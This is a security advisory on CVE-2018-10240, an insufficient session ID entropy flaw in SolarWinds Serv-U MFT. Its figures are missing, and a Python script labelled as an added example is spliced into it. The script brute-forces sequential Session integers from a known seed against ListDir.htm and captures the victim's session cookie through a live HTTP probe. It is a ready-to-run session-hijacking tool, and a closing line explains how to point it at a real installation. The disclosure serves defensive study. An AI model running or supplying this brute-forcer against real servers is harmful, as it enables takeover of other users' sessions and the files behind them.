Title:

SolarWinds Serv-U Managed File Transfer – Insufficient Session ID Entropy

Release Date:

May 3, 2018

Reported Date:

January 8, 2018

Vendor:

SolarWinds

Version Affected:

Serv-U 15.1.6.25

Summary:

SolarWinds Serv-U MFT 15.1.6.25 assigns authenticated users a low-entropy session token that can be included in requests to the application as a URL parameter in lieu of a session cookie. This session token’s value can be brute-forced by an attacker to obtain the corresponding session cookie and hijack the user’s session.

Vendor Status:

The vendor has been notified of this vulnerability, and has patched the software as of version 15.1.6 HFv1.

Exploit Availability:

The Serv-U MFT server ordinarily assigns a 128-byte session cookie upon successful authentication, as shown below:

After a user successfully logs in, the application loads ListDir.htm, which displays the user's home directory. The JavaScript in this page contains Serv-U application URLs that include a Session parameter, as shown below:

This Session value is an integer, and the Serv-U application accepts it in lieu of the session cookie, as shown below:

Request:

Response:

The research team supplied this 128-byte cookie in a request to a local installation of Serv-U running under a debugger, in order to discover the corresponding integer form of the session value:

Using the 32-bit version of Serv-U in WinDbg, the team set a breakpoint on the instruction at 1011ABFA, which corresponds to the end of the deobfuscation function that converts the 128-byte hexadecimal session value into the corresponding integer value. The address of the resulting integer session ID was held in eax, and its contents are as follows:

Because the integer is small and sequentially assigned, any one known session ID (an attacker's own, for example, which ListDir.htm discloses to every authenticated user) provides an index from which an attacker can begin incrementing or decrementing values to discover another user's valid session ID.

To demonstrate how this vulnerability could be exploited, the research team created a new user session by logging into the application once again, and then used the value obtained in Figure 7 as a starting point for guessing the newly authenticated user’s session ID. This session ID was discovered after incrementing the index value 4,780 times:

Successful brute-forcing of Serv-U MFT session ID

The server's response to this successful request included the corresponding 128-byte cookie value, shown below:
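The search the research team performed is a linear walk from a known Session integer, checking each candidate against the application until one is accepted and the server hands back the full session cookie. The script below is an added example, not Bishop Fox's tooling or any Serv-U code, and it makes several assumptions the advisory does not spell out: that ListDir.htm accepts the integer as a query-string parameter named Session (the advisory shows the parameter but not the exact URL), that a hijacked session is recognisable by an HTTP 200 response carrying a Set-Cookie header, and that the cookie name is whatever the server sets. The search logic is separated from the HTTP probe so it can be exercised offline against a constructed stand-in for the server.

```python
"""Walk candidate Serv-U session IDs outward from a known seed.

Added example; the URL layout, success criterion and sample values are
assumptions, not details from the advisory.
"""
import urllib.error
import urllib.parse
import urllib.request
from http.cookies import SimpleCookie
from typing import Callable, Dict, Iterator, List, Optional, Tuple

SESSION_PARAM = "Session"       # integer parameter named in the advisory
TARGET_PATH = "/ListDir.htm"    # assumed: exact query string is not reproduced

# A probe takes a candidate integer and returns the session cookie value the
# server hands back when the candidate is accepted, or None otherwise.
Probe = Callable[[int], Optional[str]]


def candidate_ids(seed: int, max_distance: int, direction: str = "both") -> Iterator[int]:
    """Yield seed, then IDs at distance 1, 2, ... up to max_distance.

    "up" increments only (what the advisory's demonstration did), "down"
    decrements only, "both" alternates so the nearest IDs are tried first.
    Negative IDs are skipped since the observed values are non-negative.
    """
    yield seed
    for d in range(1, max_distance + 1):
        if direction in ("up", "both"):
            yield seed + d
        if direction in ("down", "both") and seed - d >= 0:
            yield seed - d


def hunt_session(seed: int, probe: Probe, max_distance: int,
                 direction: str = "both") -> Optional[Tuple[int, str, int]]:
    """Return (session_id, cookie, attempts) for the first accepted ID, else None."""
    for attempts, sid in enumerate(candidate_ids(seed, max_distance, direction), start=1):
        cookie = probe(sid)
        if cookie is not None:
            return sid, cookie, attempts
    return None


def build_probe_url(base_url: str, session_id: int) -> str:
    """Assumed request shape: <base>/ListDir.htm?Session=<integer>."""
    query = urllib.parse.urlencode({SESSION_PARAM: session_id})
    return f"{base_url.rstrip('/')}{TARGET_PATH}?{query}"


def cookie_from_headers(set_cookie_values: List[str]) -> Optional[str]:
    """Return the value of the first cookie in a list of Set-Cookie header values."""
    for raw in set_cookie_values:
        jar = SimpleCookie()
        jar.load(raw)
        for morsel in jar.values():
            return morsel.value
    return None


def http_probe(base_url: str, timeout: float = 5.0) -> Probe:
    """Live probe: an HTTP 200 with a Set-Cookie header is treated as a hit (assumed criterion)."""
    def probe(session_id: int) -> Optional[str]:
        req = urllib.request.Request(build_probe_url(base_url, session_id))
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                if resp.status != 200:
                    return None
                return cookie_from_headers(resp.headers.get_all("Set-Cookie") or [])
        except urllib.error.HTTPError:
            return None
    return probe


def simulated_probe(valid_sessions: Dict[int, str]) -> Probe:
    """Constructed stand-in for the server: a table of live session IDs and their cookies."""
    def probe(session_id: int) -> Optional[str]:
        return valid_sessions.get(session_id)
    return probe


if __name__ == "__main__":
    # Constructed scenario mirroring the advisory's numbers: the victim's session
    # sits 4,780 above the attacker's own, and the cookie is 128 hex characters.
    seed = 100000
    victim_cookie = "a1" * 64
    result = hunt_session(seed, simulated_probe({seed + 4780: victim_cookie}), 10000, "up")
    print(result)
```

Swapping `simulated_probe` for `http_probe(base_url)` turns the same search loop into a live test against an installation you are authorised to assess; the "both" direction halves the expected distance when you do not know whether the target logged in before or after you.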

Researcher:

Baker Hamilton, MD, MMSc of Bishop Fox

For Reference:

CVE-2018-10240

National Vulnerability Database Write-Up